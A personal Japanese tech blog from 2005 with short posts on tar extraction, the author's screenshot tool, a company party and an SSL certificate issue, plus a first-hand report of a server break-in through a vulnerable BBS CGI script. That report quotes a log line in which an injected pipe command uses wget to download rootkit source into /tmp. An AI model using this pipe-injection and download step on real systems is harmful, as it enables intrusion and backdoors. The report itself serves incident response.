2005年7月31日日曜日

Windowsで4Gのtarファイルの解凍

4Gバイトのtarファイルをwindowsで解凍する必要があったのですが、LHMelt,LhaPlus,ZELDA,LHUT32,+Lhacaその他いろいろ試してどれも解凍できませんでした。
いずれも、0バイトファイルになるか、2Gで打ち止めになるかどちらかです。
いずれのソフトもtar32.lib,tar32.dllを使っているみたいなので、日本製のものは、どれもだめみたい。
(tra32は、4Gに対応しているのかもしれないが、それを組み込んでいるソフトがアドレス対応していないのかな?。解凍できるソフトが、あれば教えて頂きたいです。)
もしや、cygwinのtarコマンドなら解凍できるかと思い、
cygwinをインストールして、試してみたところ、解凍できました。(^.^)

2005年7月25日月曜日

【最重要】 全公開フリー CGI、PHP、ASP のご使用を中止


【最重要】 全公開フリー CGI、PHP、ASP のご使用を中止

[2005 年 7 月 25 日 SAKさんホームページより]
ここのBBSが気にいってずっと使っていたのですが、今回当サーバにおいても前コメントしたように、クラックされてしまいました。
(バックドアーを仕掛けられ、MySQLのユーザ&パスワードが漏洩した。Postgresは大丈夫だったが、関連するパスワードは全て付け替えました。)
ほぼ復旧&強化作業を終了して、BBS w_s3sbをバージョンアップすべく、2005.05.12 版の
w_s3mbを導入し終えた段階で、再度、SAKさんのところのお知らせページを見たところ、
2005 年 7 月 25 日、全公開フリー CGI、PHP、ASP の公開を中止とのこと。orz..
ということで、BBSで何か使えるものはないでしょうか???

サーバクラックされました。(T_T)

サクラの専用サーバをレンタルしているのですが、7/23に、見慣れないプロセスが4本起動しているのを発見(elflbl)
どうもバックドアを仕掛けられたみたい。==>ここまでで、だいぶ動揺しました。
即座に状況を保存して、プロセスをKILL、ファイルの書き換えがないか調査した。ファイルの書き換えは免れたようです。またウイルスもなく一安心です。パスワードファイルは、もって行かれてしまったようなので、パスワードを修正,DBのパスワードも修正しました。
また、起動されたと思われる,gcc,wgetは名前を変えて、囮のダミーを置いた。
さて、問題はどこから侵入されたか、もし分からない場合は、サイト停止しないといけません。このサーバには6サイトのwebが起動しており、ログも膨大です。
1.プロセスは、STIME 7/21に,起動されている。
2.プロセスオーナーは、apache
3.プロセス名は、elflbl
ということで、多分、ホームページから、クロスサイトスクリプティングにより攻撃を受けたと判断、でもどのプログラムか?
自分の作成したものは、クロスサイトスクリプティング、SQL インジェクションは対策しているので、それ以外となると、BLOGのMovable Typeが怪しいか?まず、apacheの7/21前後のerror.logを調査したところ、
sh: w_s3sb/: is a directory
--04:13:07-- http://xxx/rootkits/xxxx.c
=> `/tmp/bd.c'
あれ、dip.picolix.jpのBBSに設置している、w_s3sbがやられたようです。前後を見たところ、cgiパラメータに"|"でつないで、任意のプログラムを実行しているようです。
攻撃元は、 xxx.xxx.ru ってロシア??
==>BBS即座に停止。
作者に連絡しようかと思い、ホームページを見たところ、「重要なお知らせ」が既に5/12に、ありました。
やれやれです。w_s3sbを使っているサイトは、結構あるので、気づいていないオーナーも今もってたくさんいるのではないでしょうか?「重要なお知らせ」にあるとおり相当危険な状態です。
w_s3sbの改修バージョンはあるのだろうか?

2005年7月19日火曜日

ComSearch UPDATEしました。

ComSearch をUPDATEさせました。
ODP(DMOZ)は,2005/07/12版を使用。5/1~本日までの上場企業の追加。
ODP:全件17,329件、1,142カテゴリ (ODP:2005/7/12版)
INFO:全件3,717(5/1~7/12分 大証、東証、JASDAQ 27件追加・更新)
最新のサイトタイトル、META及びサイト画面サムネイル取得(CrenaHtml2jpg)は、ただ今、ロボット巡回中です。。
今回、自作のCrenaHtml2jpg(サイトキャプチャーツール)にて、サイトの横、縦のサイズも取得できるようにしました。
2005/7/18 企業サイト(総数18,808)のサイト画面の縦ピクセル数

2005年7月14日木曜日

[8]サイト サムネイル画像Crena Html2jpg v1.04

画面キャプチャーサイズは従来、最大デスクトップ画面でしたが、デスクトップ画面よりも大きいサイズでも画面キャプチャーできるようにしました。(結構難しかったです。。)
picture1.jpg800 x 600 =&gt 117 x 90で取得

picture1.jpg800 x 1200 =&gt 117 x 180で取得
http://www.picolix.jp/
ダウンロード

2005年7月11日月曜日

IE Context Launcher

IEの右クリックメニューから任意ソフトを起動できる「IE Context Launcher」
enpanpy Kinoさん作のソフトで、CrenaHtml2jpgの組み込み使用例を記載して頂きました。
実際、使ってみると便利なもので、気に入ったページがあれば、そのまま右クリックして、”画面キャプチャー”を選択すると指定フォルダーに、指定したパラメータで画像を保存できます。
また合わせて、SMAIL(コマンドライン型メールソフト)の使用例もあります。

2005年7月9日土曜日

会社創立10周年記念

kamogawa.jpg
↑四条鴨川床から京阪 四条方向
今日は、会社創立10周年記念&ボーナス&歓迎会ということで、京都:四条:鴨川床で宴会がありました。
普段は、2,3次会 祇園までいくのですがあいにく明日は、用事があり”しらふ”でないとだめなので、1次会で切り上げてきました。
まあ、いつもだと2,3次会まで行くので、こんなBLOG記事もかけず終わってしまっているのですが。。(笑う)

2005年7月8日金曜日

2005年7月6日水曜日

[7]サイト サムネイル画像Crena Html2jpg v1.02

CrenaHtml2jpg v1.02が完成しました。
http://dip.picolix.jp/page3.html
http://dip.picolix.jp/disp5.html
自身の要求レベルは、これで満足しているのですが、今後,下記の機能を予定しています。
1)geckoコアモジュールが公開されているので、CrenaHtml2jpgに組み込んで、IE APIとgeckoエンジンを切り替えてキャプチャー可能にしたい。
http://moz.skillup.jp/catalog/libraries/embed/
2)リダイレクトサイトで、リダイレクト後の画面の取得が曖昧なので、完全に取得できるようにする。
3)GUI系にCSVファイルを読み込んで、連続自動取得できるようにする。時間指定&スケジュール機能

2005年7月1日金曜日

AU携帯とSSL サーバ証明書

あるグループウェアー携帯サイトのプレリリースを予定しているのだが、SSLサーバ証明書は、証明書パスのないもの(デフォルトでApacheに設定されているもの)を使い、リリース後に、正式にSSLサーバ証明書を取得予定でしたが、当方の推奨AU携帯W22SAでは、証明書警告の画面が出て、以降アクセスできないことが判明。(リリースはもう後何日もない。。)